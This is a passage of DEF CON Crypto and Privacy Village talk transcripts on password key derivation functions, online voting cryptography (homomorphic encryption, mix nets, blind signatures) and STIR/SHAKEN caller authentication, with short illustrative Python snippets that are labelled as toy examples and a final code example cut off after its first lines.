derivation functions; use memory hard functions based on your choice and your comfort level with the amount of cryptanalysis done; please don't do plain text, or plain hashing, or your own DIY designs — those are all silly things in today's time; consider upgrading your work factors based on the cost of resources out in the market; consider having unique work factors for the information you are trying to save, or for each different user as well. Password hashing suggestion: longer is better than shorter with higher entropy. Keep updating passwords, and keep auditing your passwords for their existence in any breaches. And finally I'd like to conclude with a huge thanks for giving me this opportunity to share my thoughts. My DMs are always open for any interesting conversations, I blog a lot about these things in much more detail than what a 45 minute slot is ever going to allow me to, and finally you will find all these algorithms implemented in Java, as well as the tuning tool, on my GitHub repo. Thank you. That was how to store sensitive information in 2020 and how to use crypto building blocks, using Java. Thank you again to Moncy. We have them right here for a live Q&A, so please put your questions in the Discord. So this just started off: what's the reason high memory usage is a requirement for KDFs? This is from Discord by the way. I understand it helps make implementing ASICs harder but I don't understand why. Sure. So ASICs in my opinion really started coming into existence because of the underlying Bitcoin mining philosophy of, like, increasing the computation over and over again much, much faster. The hardware is still very expensive, and throwing memory at it will just make it much more expensive for widespread adoption, actually, and that would ultimately add to the cost of cracking passwords offline, in my opinion. Again, we have not seen the future. We don't know what quantum is going to get us, but for the foreseeable future, for whatever the current theoretical cryptanalysis says, that's what it is. Awesome. We have another question. If memory is the bottleneck, is there still an advantage to using ASICs, or does it revert to only negligible gain over general purpose CPUs? Well, we still have a huge iteration factor, right, so it's a combination of both. So a general purpose CPU can't be that highly parallelized with the amount of memory required for each thread. So yeah. Another question that we have is: does a salt need to be just unique, instead of being that big, to avoid having two passwords hash to the same thing? This is in relation to 64 bits versus say 128 bits. Sure. Well, 64 bits is like the bare minimum requirement anyways, from a standard which is, I mean, at least five or six years old — I don't remember right now, actually even more; this is PBKDF2 probably. So I mean a little bit more salt, 128, is not unacceptable. It's not going to add hugely to the processing power. Yeah. It's not a hard requirement. Even a CSPRNG is, like, maybe a little too much crypto kind of a situation. So yeah, it's a little bit on the higher side, but that's okay in my opinion. It does not add to the computation at all. Awesome. Another question we have — and there were some side parts of this of course in chat if you want to go further into them, as I saw — but the question was: any thoughts on using libsodium, the fork, instead of NaCl? I have had great experiences with it. Yeah. Libsodium is great. It is being adopted much more widely, as I stood corrected.
NaCl was last released, like, at least five, six years ago. I have a slight preference for NaCl just because I like the documentation and the names of the APIs, and the ease with which they take options away — the more options you give, the higher the chances of it actually going wrong. So that way I feel NaCl is slightly better, but libsodium is absolutely great anyways. So that's my personal preference. But yeah. Awesome. Does anyone have any other Q&A questions? Please drop them into the Discord now. This is in the CPV talk Q&A text channel. And we'll just wait for a little bit. Also thank you so much for your talks. These are really lovely and I'm really excited for the next one to be replayed again soon. Thank you. I'm having a lot of fun watching me talk for two hours. Oh man, that's a lot of anxiety for me at least. Oh, that's fun. I think we have someone typing. Oh nope, just people love your talk. Thank you. Let's see. Let's see if this last person has a question. Alright, thank you again Moncy for all your time with us. We hope you take care. Enjoy the rest of the Crypto and Privacy Village and DEF CON. We would love to see you in our Discord soon. Yep, please stay safe everyone. Please stay safe. Thank you. Bye. Take care.
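To make the Argon2id demo described in this talk a bit more concrete, here is a minimal sketch of the kind of call being shown, using PyNaCl (a Python binding over libsodium's pwhash API). The placeholder password and the opslimit/memlimit values (14 passes, 2**27 bytes, mirroring the numbers mentioned in the talk) are assumptions meant to be re-tuned on your own hardware rather than copied blindly.

```python
# Sketch of Argon2id password storage with PyNaCl (pip install pynacl).
import time
import nacl.pwhash

password = b"correct horse battery staple"   # placeholder secret

opslimit = 14          # passes over the memory array (talk: anything above ~10)
memlimit = 2 ** 27     # ~128 MB; 2**28 roughly doubles the runtime

start = time.time()
stored = nacl.pwhash.argon2id.str(password, opslimit=opslimit, memlimit=memlimit)
print("hashing took %.2f seconds" % (time.time() - start))
print(stored)          # self-describing string (parameters + salt + hash), safe to store

# Later, at login time: verify() re-runs Argon2id with the stored parameters.
assert nacl.pwhash.argon2id.verify(stored, password)
```

Because the returned string embeds the salt and the work factors, raising the work factors later only requires re-hashing at the user's next successful login.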
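The talk also points at Troy Hunt's breached-password API as something websites and password managers could call. Here is a hedged sketch of the Have I Been Pwned k-anonymity range endpoint; the function name is my own, and only the first five hex characters of the SHA-1 of the candidate password ever leave your machine.

```python
# Check a candidate password against the Pwned Passwords corpus (pip install requests).
import hashlib
import requests

def times_pwned(password: str) -> int:
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    resp = requests.get(f"https://api.pwnedpasswords.com/range/{prefix}", timeout=10)
    resp.raise_for_status()
    # Response lines look like "<35-hex-char suffix>:<count>"
    for line in resp.text.splitlines():
        candidate, _, count = line.partition(":")
        if candidate == suffix:
            return int(count)
    return 0

print(times_pwned("password1"))   # a frequently breached password returns a large count
```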
|
It goes without saying never ever store personal/sensitive information in clear text. It is also a well-known fact salting, hashing or stretching your information can just provide little offline information cracking protection against contemporary computer architectures and modern brute force attack constructs. Those abreast with this subject would have come across countless advocatory material suggesting to use key derivation functions (KDFs) to store sensitive information. There are handful of solid KDFs, which are good candidates to use for storing sensitive information such as pbkdf2, bcrypt, scrypt, Argon2. In this talk, lets dive deeper to study some of its underlying crypto, what and how to tune these algorithms with secure input parameter configurations and how to decide which algorithm would be the right choice for your needs? Lastly, I will present some statistics on how well do all these different algorithms compare against each other.
|
10.5446/51627 (DOI)
|
Hi everyone, welcome to Online Voting: Theory and Practice with Porter Adams and Emily Stamm. We're at the DEF CON Crypto and Privacy Village in August 2020. My name is Porter Adams. I'm a software engineer at Blacktop Government Solutions and founder of Disappeared Digital. You can contact me on Twitter at PrivacyPorter. I'm Emily. I'm a security research engineer at Allstate. I'm also the COO and co-founder of Cybersecurity Non-Profit, or CSNP. You can find me on Instagram at crypto.emily. So, talk outline. We've got three major pieces. We're doing a quick intro now. I will be talking about the practice of online voting, and Emily will talk about the theory of online voting, going into homomorphic encryption, mix nets, and blind signatures. So we're talking about online voting. So not all election security, not even all voting, just online voting. So what do I mean by that? So one form of online voting is what's called electronic voting or e-voting. And that just refers to something that includes at least some electronics. So in the United States, a lot of our voting systems already use e-voting by having computer screens that you can touch. But e-voting does not necessarily mean all online. Internet voting is what people would think of as like 100% online. Internet voting is when it's all gone fully digital and there's no need for anything in person. So for safety of voting machines, I'm just going to refer you to the DEF CON Voting Village. They do a lot of really great work over there. It's not the focus of our talk. We're going to be talking more about the internet voting side of things and how it would be possible to vote entirely online. So this is the biggest question I get: why can't we all vote from our phones? And it's a really great question. And so we're going to spend some time explaining actual reasons why we can't yet. The advantages, and why people want to vote from our phones in the first place: the first one is just the convenience factor. It's so much easier if I can sit at home and vote from my phone. It's also especially easier for overseas voters who currently have to vote by mail; that can take a long time for their mail to get in, and their votes may not even be counted in time. So it's a lot easier for expats to vote from their phones. It also would hopefully improve voter turnout, because it's a lot less effort to download an app on my phone and click some buttons than it is to show up at the polling station. Less human error: so we all remember the 2000 election with the hanging chads in Florida and not being able to determine which way the votes went. When we vote on a computer it's either a zero or one. It's pretty clear and doesn't leave room for human error when filling out the ballot. So let's talk a bit about usability. So even if we had a totally working mobile app that everyone could download and use, and it was all safe and private — which are concerns I'll get to later in the talk. In Finland in 2008 they had some issues with the user interface, and what happened was, when people were going to vote they would see the screen, they would tap through and click all the candidates they wanted to vote for. But at the bottom of the screen was a submit button, and about 2 percent of voters did not see the submit button on the screen, and therefore their votes were not counted in the 2008 Finland election.
It is a user interface problem that would be a big issue if people tried to vote but mistakenly like didn't hit submit button that would be a concern even if everything else was safe and secure and working. The other case I want to bring up as Iowa in 2020 at the Democratic caucus had many problems with their mobile app that they tried to use to help tally up the votes. We can learn a lot of lessons from that but one I want to highlight is that some people had trouble even downloading the app correctly. And so even again if we had like all the security and privacy stuff worked out there's still some usability concerns with can people download the app can people use the app. All of this kind of comes down to like comfort with electronics which a lot of us have here at like DEF CON but not everyone else in the world is as comfortable as we are with using these things. So here are some of the big concerns and security is by far the biggest one. We need to make sure that our elections actually safe. Privacy is making sure like is it possible to even do a secret ballot online because we all know there's so much tracking and surveillance with what we do online that having actually private vote would be pretty tough. So I'm going to try and answer both these questions in the remainder of my talk. So first security is it safe. There is a huge attack service for anything that's going to be online some sort of mobile app. And so let's just kind of go quickly over like all the different ways that would need to be like that could be a voting app could be attacked by. And we would need if we wanted to do this in practice to show up all of these things and make sure that none of these could happen. So if I was a hacker trying to attack a voting app I could install a back door either as you vote on the client side or when the votes are tallied on the server side. I could create an exploit for the voting app itself or for the phone operating system or for the server code server operating system. I could spy on votes by intercepting the connection maybe with a fake wireless access point or a key logger on person's device. There's always social engineering you'd have to worry about with phishing app insider threat whoever like created the code for any of these pieces you have to watch out for. And I was running the election and then just destructive attacks like a distributed denial of service where the app just goes down on the day we're all supposed to be voting. So usually when I'm trying to explain all of this to someone they always come up with but banks have mobile apps and this is a really smart point and so it's worth addressing why even though banks have mobile apps it's still very tough for a voting system to be on a mobile app. So what's the difference between a voting app and a banking app? First one's identity when you're banking basically anyone with your credit card info can go online order some stuff on Amazon but when you're voting we need to make sure that it is really only you. In terms of security banking has the benefit of being able to detect fraud kind of later and afterwards whereas with an election if there's any sort of fraud going on we need to know about it immediately. And privacy is one of the biggest differences where when it's just you and your bank talking and like your bank knows everything and you know all of your own stuff that's fairly easy to figure out just between the two of you. 
But for voting we all have secret ballots, which I'll get to in a little bit; it makes it very challenging for my vote to stay secret while everybody else still trusts that votes were placed correctly. And then lastly, trust: in banking it's really just between you and the bank, and other accounts don't really affect you, or other people using your bank; versus in a voting system, in a voting app, I need to trust all of the votes from everybody, not just my own, and so trust is very different for a voting app. So the privacy challenges specifically of online voting: first you've got the secret ballot, and so what does that mean? More or less that I need to be anonymous when I vote. So no one should be able to figure out who I voted for, and there shouldn't even be a way for me to prove it to anyone next to me or around me, so no one can force me to vote a certain way. It's very important for our elections. Voter registration is not exactly a privacy challenge, it's like an identity thing, but it's going to be kind of related so I include it here. Voter registration: I need to be very sure that whoever is submitting the information in this voting app is the person on the registration list, and this counts against double voting, which on the internet would be much easier to happen, where you could submit something twice and have it accidentally be double counted. And trust is the big third privacy challenge, where all votes must be trusted, and typically to ensure that trust, that means lots of visibility. And so the big challenge here overall is combining the secret ballot with trust: you have to somehow include all the anonymity expected for voters while still having all the visibility needed for the overall election and for everyone to trust the results, and putting these two together digitally is actually extremely tough and will require some really cool math that Emily will talk about in the second half of this talk. So cryptography for online voting is the answer; it's going to solve all of our privacy concerns, and I just want to say big thanks to cryptographer David Chaum for inventing a lot of this stuff. If you're at the Crypto and Privacy Village at DEF CON and have not heard of David Chaum before, please look up some of the work he's done — awesome stuff. Okay, so how does Estonia vote online? Especially in the United States, anytime this gets brought up it's like, how is some other country doing it but we can't? First step: identity. In Estonia they all have a national ID card that includes a chip on it that they can create digital signatures from, which essentially means their government issued IDs can act as a form of identity on the internet, so they can log in using these chips — although I believe in the last two years they have switched from hardware chips to an authenticator app — but this still stands that they have some sort of way of converting from your real life presence to your online presence.
Secondly, cryptography: Estonia uses a combination of mix nets and homomorphic encryption, specifically using ElGamal, and Emily will explain what those are in the later half of this talk. And in terms of trust, Estonia has been voting online since, I think, 2005, and every year they keep making gradual improvements. Anytime security people go check it out there's always something that's broken, which isn't really surprising, but Estonia has done a good job of fixing the things that are broken, and over time the system's gotten a lot better and hopefully is mostly safe from real threats. They haven't had any giant accusations of election interference, so either that means they haven't caught anyone interfering in their elections, or they've actually been doing a good job. In 2019 almost a quarter million Estonians voted online, which is a very impressive number and goes to show that this is possible in the future if it is done slowly and correctly. Now, one big thing to watch out for is cryptographic backdoors; these are tough to catch. So Switzerland has been doing online voting, and some researchers looked into their mix net shuffle proof and found a naive implementation of the zero knowledge proofs inside of there, which would have allowed for all of the votes to be changed by an attacker. And so every last inch of the app needs to be very carefully done, and especially when it comes to cryptography you need the person who's coding it to be aware of all of the cryptographic assumptions and make sure that they are coding everything properly. So let's look at voting cryptography around the world. Three big ones I want to point out are Estonia, Switzerland, and then Moscow, which has some local elections that are online. Estonia uses a combination of homomorphic encryption and mix nets, same thing for Switzerland, and Moscow is using homomorphic encryption and blind signatures. So not too many countries or places around the world have an online option right now; there are a lot more countries that have tried doing this and quit. Belgium, Finland, France, Germany, Ireland, Kazakhstan, the Netherlands, Norway are on the list, and the reasons for quitting are mostly either every security person says it's not very safe, or the voter trust in an online system is just not very high. And one of the most important things for an election is that voters do trust the system, and so even if online voting is safe, if the voters all think that it's not safe then it's not a good idea to offer an internet voting option. All right, so now I'll talk about the cryptography behind the scenes that makes online voting possible. So some of the considerations we have: the first is security, so preventing attacks, preventing adversaries from tampering with the election, and being able to detect faulty voters and centers. The second is robustness, so no small set of servers should be able to disrupt the election. Accuracy: the results should reflect the way people actually voted. Verifiability: we should be able to verify that the votes are accurate; in particular, individuals should be able to verify that their vote was counted correctly. Confidentiality: keeping votes secret is crucial. Usability for all ages, and speed and efficiency, including casting the votes, processing them, and counting them. So there are three types of cryptographic protocols I'll cover in this talk: homomorphic encryption, mix networks, and blind signatures.
So first homomorphic encryption. So homomorphic encryption is computation on encrypted data so this form of encryption actually allows us to do computations on the data when it's in its encrypted state. There's been a lot of research into this area and it's very promising because generally our cryptography when we have our data and it's encrypted we can't use that data in any way. The only way we can actually make use of it is to decrypt it back into its original form. But with homomorphic encryption we can actually perform computations on the encrypted data. So this means we could outsource data to cloud environments for processing all while encrypted. We could perform data analysis again while data remains in its encrypted form and in particular with election voting we could obtain a tally of the encrypted votes without actually having to decrypt the individual votes maintaining privacy the entire time. So to give a little bit more of the mathematics of the scheme. So homomorphic the term actually comes from a math term called homomorphism which is a math that preserves some structure. So that's what you can kind of think of homomorphic encryption as doing. It preserves some underlying structure enough to perform functions on it. So you have a message you encrypt that message you perform a function on it and then you decrypt it and that would be the same thing as if you apply the function directly to the message. And there's different types of homomorphic encryption. Generally they are categorized based on what kinds of computations you can perform whether it's just partial whether it's addition multiplication. But we even have fully homomorphic encryption and that actually can perform arbitrary gates and depths meaning really arbitrary computations. The only practical and secure fully homomorphic encryption implementations currently are based off of lattices. So lattice cryptography it's this new relatively new form of cryptography that is beginning a lot of attention recently partially because it's quantum secure cryptography meaning that it's secure against quantum computers. And it's actually most of the finalists in the post quantum cryptography NIST competition are lattice based. And lattice cryptography has some very strong security assumptions especially compared to our classical cryptography like RSA. It's also very flexible and efficient. Generally the main downside is that it has large key sizes but depending on the scheme they're not even always that much larger than RSA. So lattice cryptography is very important for the fully homomorphic encryption but we'll also touch on it when we come back to blind signatures. So I just wanted to mention what that is. And so now we'll turn back to homomorphic encryption in voting in particular. So how does it help? So we can tally the votes in the encrypted state which means we take all the votes in in their encrypted state add them together and then decrypt the result. And because of the homomorphic encryption we get the same result as if we decrypted them separately and added them together. So this allows voters to maintain their privacy. There's also a protocol that allows voters to verify their votes. And even if we don't use homomorphic encryption in the election we can still use it for ballot comparison. So ballot comparison is very important in the election process to inspire voter confidence by comparing ballots and the electronic records. 
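To make the tallying idea described above concrete — add the votes while they are still encrypted, decrypt only the total — here is a toy sketch of additively homomorphic ("exponential") ElGamal, the flavour mentioned earlier for Estonia. The parameters, key handling, and vote values are all illustrative assumptions: a real system would use large groups, threshold decryption by multiple trustees, and zero-knowledge proofs that each ciphertext really encrypts a 0 or a 1.

```python
# Toy additively homomorphic tally; NOT secure as written (tiny parameters, no proofs).
import random

p = 2879            # small safe prime (p = 2q + 1), demo-sized only
q = (p - 1) // 2    # prime order of the subgroup we work in
g = 4               # generator of the order-q subgroup (a quadratic residue mod p)

x = random.randrange(1, q)      # election private key (really held by trustees)
h = pow(g, x, p)                # election public key

def encrypt_vote(bit):
    """Encrypt a 0/1 vote; the vote sits in the exponent of g."""
    r = random.randrange(1, q)
    return (pow(g, r, p), (pow(g, bit, p) * pow(h, r, p)) % p)

def combine(c_a, c_b):
    """Component-wise product of ciphertexts = encryption of the sum of the votes."""
    return ((c_a[0] * c_b[0]) % p, (c_a[1] * c_b[1]) % p)

def decrypt_tally(c, max_votes):
    """Recover g**tally, then brute-force the small discrete log to get the tally."""
    g_tally = (c[1] * pow(c[0], p - 1 - x, p)) % p
    for t in range(max_votes + 1):
        if pow(g, t, p) == g_tally:
            return t
    raise ValueError("tally out of range")

ballots = [1, 0, 1, 1, 0, 1]                      # six voters, four "yes" votes
encrypted = [encrypt_vote(b) for b in ballots]
running = encrypted[0]
for c in encrypted[1:]:
    running = combine(running, c)                 # tally without decrypting any ballot
print("yes votes:", decrypt_tally(running, len(ballots)))   # -> 4
```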
And the way we could use homomorphic encryption is this in this is that we can actually do this comparison on the votes in their encrypted state. So we would inspire voter confidence without actually giving any information about the votes. And how this is done now is the votes are anonymous but even still with anonymous with not tying them back to the individuals you can still find patterns. So it would be more secure if they were in their encrypted state. So next I'll talk about mixed networks. So mixed networks also called mixed nets are routing protocols that use a chain of proxy servers and senders mixes to take in messages from senders and send them to receivers in some random order. Additionally they use encryption at each state and it makes it harder to trace. And you can also think of it as being kind of like a Russian doll some nested encryption going through. So there's two types. There's the decryption mix net. So that's where you do all the encryption in the beginning and then you partially decrypt and mix at each stage. There's also re-encryption where you re-encrypt and mix at each stage and do do the full decryption at the last round. And there's also shuffle and decrypt proofs for verification as well. So lastly we'll talk about blind signatures. So just to recall a digital signature provides authenticity. So verifying that you're talking to the person you think you are verifying a known sender and integrity verifying that the message you're receiving has not been altered in transit maliciously or accidentally. So how it works is one party signs the message and creates a signature with a private key and then the other party will verify that with a public key. So with blind signatures it's a digital signature where the message is masked or blinded and then sent and then signed. So blind signatures can then be verified against the original message the same way digital signatures are. The key difference is that with blind signatures the person signing them doesn't know the contents of the message. So voting is actually a common analogy with blind signatures. So imagine you have a voter and they complete an anonymous ballot which they then place in an envelope with their credentials. They hand that envelope to an official who signs it and the signature of the official imprints through the envelope onto the ballot and they return that envelope to the voter. The voter then places the ballot in a different unmarked envelope before submitting it. So now the message was correctly insufficiently signed by an official without the official having to know the contents of the message. So it provided the authenticity and integrity but maintained the confidentiality. So to talk a little bit more about the scheme in a less analogous way what actually happens. So a user has some message D and they blind the message to get a new message D star and that's what they send to the signer. The signer then uses the private key to generate a signature sigma star for that message D star and returns it to the user. The user can then create from sigma star a valid signature sigma corresponding to their original message. So any recipient can now validate this signature sigma as they would any other signature and the signer gets no information about the contents of the message or the actual signature. And there's different mathematics behind blind signatures. There are RSA based options. 
I don't I wouldn't recommend using these because with where we are right now if we're implementing new technology we want to be looking as far ahead as possible. And in the long run RSA is not secure against quantum computers and just is not secure compared to these other types of schemes. But there's also some attacks on the RSA based blind signatures. So I'm mostly going to focus on the lattice and the multivariate base. So the lattice based blind signatures again they're post-quantum secure and they rely on similar problems, similar types of schemes as those that are finalists in the NIST post-quantum cryptography competition. So we have a lot of faith in these lattice based schemes and we can create blind signatures from them. Additionally multivariate there's a scheme called the rainbow scheme that's a finalist in the NIST post-quantum cryptography signature schemes competition. So again it leads to be post-quantum secure and we can turn this scheme into a blind signature scheme. And there's a lot of benefits to multivariate cryptography such as having very fast and short signatures. And this diagram just kind of shows how the rainbow scheme works. Essentially you have a message w, the hashed message, and you recursively obtain inverses of these functions to get the signature z. And then that signature z can be verified by using the public key function and just applying that to see if you get the correct message back. With blind signatures there's just an extra, some extra steps in this process. You use a special function called r that actually by using that you create the blind aspect of it and then you use zero knowledge proofs at the end as well as part of the verification proof. So a little bit more complicated but again very similar mathematics. So in summary we talked about homomorphic encryption, so computation on encrypted votes which allows us to tally the votes in their encrypted form. And it can use different types of cryptography but lattice space is one that is post quantum secure and very flexible. Then we talked about the mixed networks protocol where you have a nested series of encryption or re-encryptions and shufflings and this way you cannot determine which person the vote came from. And there's also a range of underlying public key cryptography mathematics that I didn't go over but the protocol itself is fairly flexible. And finally we talked about blind signatures. So this is where you create a valid signature without knowing the contents of the message. So you're verifying authenticity and integrity of a vote while maintaining confidentiality of a voter. And we talked about lattice and multivariate based schemes. To summarize everything is it possible theoretically? Yes eventually cryptographers will help us get it right as well as security people. Is it ready in practice? Not yet in the United States. Let's start small scale and maybe eventually we'll be able to have more voters vote from their phones. So thank you. Thank you for coming to the talk.
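Since the blind/sign/unblind/verify flow is easier to see in code than in prose, here is a toy sketch of a blind signature. It uses the classic RSA construction purely because it fits in a few lines; as the talk notes, RSA-based blind signatures are not what you would pick for a new system (lattice or multivariate schemes are the post-quantum recommendations). The tiny textbook key, the integer-encoded "ballot", and the absence of hashing and padding are all illustrative assumptions.

```python
# Toy RSA blind signature: the signer never sees the message it signs.
# Requires Python 3.8+ for pow(x, -1, m). NOT secure as written.
import math
import random

p, q = 61, 53                        # textbook-sized primes (placeholder key)
n = p * q                            # 3233
e = 17
d = pow(e, -1, (p - 1) * (q - 1))    # signer's private exponent

m = 1234                             # the "ballot", encoded as an integer < n

# Voter blinds the message with a random factor r coprime to n
while True:
    r = random.randrange(2, n)
    if math.gcd(r, n) == 1:
        break
m_blind = (m * pow(r, e, n)) % n

# Official signs the blinded value without learning m
sig_blind = pow(m_blind, d, n)

# Voter unblinds to obtain a signature on the original message
sig = (sig_blind * pow(r, -1, n)) % n

# Anyone can verify the signature against the original message
assert pow(sig, e, n) == m % n
print("signature on the unseen ballot:", sig)
```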
|
The concept of voting online is daunting to many because of the security risks, feasibility, and reliability. However, given the presence of election interference, limitations of in-person voting, and adoption of new technology, many countries are converting to electronic voting. In this talk, we discuss the theoretical and practical benefits and limitations of electronic voting. Emily Stamm will discuss the mathematics behind homomorphic encryption and blind signature schemes, with an emphasis on schemes that are secure against quantum computers. Porter Adams will discuss how these schemes and others are used in practice, and analyze the advantages and disadvantages of electronic voting.
|
10.5446/51629 (DOI)
|
Hey everyone, if you're anything like me, your miss calls list looks a lot like this. And I know I'm not unique, you know, the average person gets about 14 unwanted calls every month. And you might notice that some of these in my call list are flagged as spam, which is somewhat useful. But what if we could actually start to verify callers? What if we weren't just flagging things as spam and potentially harmful, but actually doing the opposite and saying, hey, you can trust this call? We already do this with websites. We already do this with emails. Why can't we do this with phone numbers? The good news is the short answer is that we can. And I'm going to be telling you about this TLS-like technology that's been developed to solve the call authentication problem. It's called shaken and stir and we'll be diving into the history of why this is a problem, some definitions and technical details of the spec. How the US is going to enforce implementation. Unfortunately, a lot of this is specific to North America right now. But we'll also be diving into the limitations of what this technology is, one of those obviously being that it's not applicable to the rest of the globe yet. My name is Kelly Robinson. I have been working at Twilio for about three years. Twilio offers a lot of communication services, including a lot of stuff around telephony. I actually work on Twilio's account security products for things like phone verification, but this was just something that I got really interested in terms of what the telephony security of actually authenticating call systems was. So we have a separate team that I'm not involved with at Twilio that is working on implementing some of this stuff, but this is just some of my own research into what this is, how it works and hopefully I can share that with you. And somewhat of an introduction to what Shaginstar is. So let's start with just talking about what telephony security even means. Security isn't quotes there very obviously because basically there wasn't a lot of security when telephony got started. There was a monopoly of companies and even as recent as 30 years ago, the network basically looked like this. It was private, it was closed, there was proprietary technology everywhere, there were just a couple of companies and they all basically knew how to trust each other, they all knew who they were dealing with and they all had direct lines of communication with one another. And if you compare that to today, there's literally thousands of companies, it's really easy to access this technology. There's more standard technology now built on top of IP so you don't have to have this kind of proprietary technology and a lot of infrastructure to get started. And there's all these potential paths and routes for a call to take. And you can think of the difference in accessing the telephony network like you would in deploying a website today. So this is kind of the difference between having your own on-prem hardware, your own servers that you're running versus today you can use something like AWS to get up and running very quickly. And before we dive into this a little bit further, I do want to give a little bit more context on some telephony jargon. If you aren't familiar with telephony, like I wasn't before I started working at a telephony company and starting with a PSTN. So this is the analog and digital systems like cellular networks, undersea fiber optic cables and copper telephone lines. This is what allows people across the globe to complete voice calls. 
Something that you might have heard of before is VoIP. This is the voice over internet protocol. This is what a lot of mobile infrastructure and businesses are actually using now. And so this is what people are moving towards. This is kind of the standard technology that people have more access to now. But it can also interact with the PSTN. And then finally, SIP is a way to initiate IP phone calls and other communications. You can kind of think of it like an HTTP request for phone calls. It contains metadata and instructions about where a call is coming from, who it's going to, and some other data about what the call should be. And the important thing to note here is that shaken and stir will only apply to SIP initiated phone calls. And so let's kind of talk about what the problem is here. And I specifically frame this as unwanted robocalls because not all robocalls are bad. So you can think of things like prescription pickup notifications, food delivery services, you know, things like the school has a snow delay type thing. There's reasons to automatically dial. But we do know that most of the robocalls that we get aren't that; they're spam, and that's bad. And so we wanted to focus on the greater problem of the unwanted robocalls here. And the reason this is a problem — it's gotten super common in the last five to 10 years — for a few main reasons. First, there's a lot of cheap dialers now. It's really easy to do this automated dialing in an efficient way that actually makes spam and fraud both more efficient and also more profitable. And second, there's over 4,000 service providers in the US alone, and that makes it easier to access and also gives you more options to access the PSTN. And third, there's no validation or authentication on who is placing a call. So you can basically set the from number to whatever you want. And so there's an app that I downloaded on iOS that just lets you spoof phone numbers. And you don't really even have to know how SIP works. Like there's a way that you can do this with some SIP knowledge that's even cheaper. But there's these consumer applications that you can download if you're an iOS or Android user, so you don't have to have any technical know-how. And you'll just have to believe me that this is a call I placed to myself from 8675309. So you might be asking, like, why isn't this just illegal, right? And the main reason is that there are some legitimate use cases for spoofing phone numbers. So nowadays, the practice for companies like Uber or DoorDash or something like that, they'll proxy phone calls through a third number that connects individuals. So like when you call your Uber driver, or when your DoorDash delivery person calls you, you're not getting a phone call from their number. You're getting a phone call from a third party, a number that's being proxied in between you. And that has privacy use cases and also some cost saving measures. But it wasn't always like that, right? And so you also had enterprise systems or private branch exchanges that might be placing a call to a customer from an individual agent's line, but they want to display something like the toll free callback number. And historically, those were just spoofed. You would say, hey, this isn't coming from me, Kelly. This is coming from my organization. And I want to make sure that you see this from number in case you need to call that back. And these systems still exist. So we can't just outlaw this completely.
In fact, the New York Times actually spoofed their from number until 2011. And it was one of those things to help protect their sources. If journalists were calling from their desk phones, they didn't want to necessarily be calling from an individual journalist's phone, but they actually will use a 212 number that you can call back. We did introduce some legislation to address this. The 2009 Truth in Caller ID Act was what did that. So again, it's only about 10 years old that we started to really think about this as a problem. But we can't completely ban call spoofing because of the legitimate ways that businesses are still using it. So legislation specifies that it is illegal to spoof numbers if there's that intent to defraud. But there's also this enforcement struggle with this, because of the network hops: it might take five or 10 service providers before you know who actually initiated the call. And they might or might not be able to tell you about the caller because they're placing calls on behalf of many, many customers. And so tracking down a spammer takes a lot of time and effort and therefore money. And that makes enforcement of this really hard. So that brings us to the solution. That brings us to shaken and stir and what we're here to do. Shaken and stir are the most egregious of backronyms. So SHAKEN is the Signature-based Handling of Asserted information using toKENs. STIR, again, is Secure Telephone Identity Revisited. It does get worse. There's a proposal out there for lemon twist, but we're not even going to look at that because I think people are just getting a little too creative. But basically, as the FCC describes it, what shaken and stir does is calls would have their caller ID signed as legitimate by the originating carriers and then validated by the terminating carriers before reaching consumers. And so this is where it comes into that TLS-like authentication. You are signing calls as legitimate, and then the terminating service provider would then display some information to the end user signifying that calls can be trusted and they were not spoofed. We're not reinventing a wheel here. We're borrowing from other web authentication; things like public key infrastructure, certificates, JSON web tokens are all being used for this. And it's very similar to email's DKIM and DMARC, which basically authenticate the from sender in an email. And so a lot of the work that was done on shaken and stir was done in conjunction with some of the authors from DKIM and DMARC as a way to kind of set best practices for this type of communication. And this is a simplified view of the end to end system, what happens with the shaken and stir signed calls. So the signing service includes some public key infrastructure, key management, and it will be up to the originating service provider to do the key management there. And so calls are routed in a few ways. So basically between the originating service provider and the terminating service provider, you might remember from that earlier slide that there's all these kind of routes that a call can take. And the way that that happens is there's something called the LNP or local number portability. And this is what people are using to both track whether numbers have been ported between carriers, but it also works as kind of a DNS-like lookup to look up phone numbers so that you can then route calls to the right service provider. And usually the originating service provider, it's up to them to basically do this routing.
The onus is on them to decide on the route that a call is going to take. They're usually using something called least cost routing. Twilio uses an interexchange carrier. There are vendors that allow you to do this, to route calls. I don't want to get into that too much, but basically when it is being passed through the other service providers in the middle there, it is just being passed through. There's no additional validation in the middle there. They're just passing the call through. And then on the other side of things, the terminating service provider then has their own verification service. And the verification service is what contacts the certificate authority and uses the certificate authority's authority there to then verify whether or not the call that came into them is a valid signed call. And so certificate authorities are being chosen by ATIS. That's the Alliance for Telecommunications Industry Solutions. And so this is the standards body that authored shaken. So some of the certificate authorities that have been chosen are people like Neustar and TransNexus. I think there's a few others that haven't been publicly announced yet. And these are similar to the certificate authorities that administer TLS certificates, like Let's Encrypt. And so then when a call reaches the terminating service provider, it's up to the client — so this would be somebody like Apple or Google — to decide how to display that the calls are trusted. And so this could be something like, hey, I've got a check mark next to this call. We display something like you saw in an earlier slide that says there's a verified caller here. You could do something like a lock that we have in browsers with the TLS, HTTPS sites. So there's different options here, and that has not been standardized in terms of how to signify to consumers that these calls are not spoofed. And so I think that's going to be one of the interesting challenges that we see as it just gets rolled out more: how do we build this trust on the consumer end of things and display this to them in a consistent way so that they know what to expect. So let's get into a little bit of the weeds of how this actually works from the technical perspective. So this is what a SIP header looks like currently. You can see the metadata included there. Just a reminder, SIP is a way to initiate voice calls. But note the from here. So the problem here is that the from number can be spoofed, and that happens if the originating service provider allows it or isn't doing any validation on that. There might be those legitimate reasons for that, but a lot of legitimate service providers are already doing this validation. They're not letting you place calls from numbers that you don't have access to. But, like I mentioned, there's over 4,000 service providers in the US alone, and a lot of the long-tail service providers might not be doing this validation. So what shaken does is it introduces a new identity header. And this is in the form of a base64 encoded JSON web token. And I'm going to focus on just some of the information that's encoded in the middle section here. And so the information that's encoded there includes things like the attestation level. And so this is in the header. And we'll talk more about what the attestation level is on the next slide. But this is basically the crux of whether or not we trust this call.
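To make that identity header a little more concrete, here is a hedged sketch of building and verifying a SHAKEN-style PASSporT in code. The claim layout follows the public STIR/SHAKEN RFCs (8225/8588); the signing key, certificate URL, telephone numbers, and origination ID are made-up placeholders, and the certificate fetch and validation against a STIR certificate authority is omitted.

```python
# Sketch of a SHAKEN PASSporT, the signed JWT carried in the SIP Identity header.
# Requires: pip install pyjwt cryptography
import time
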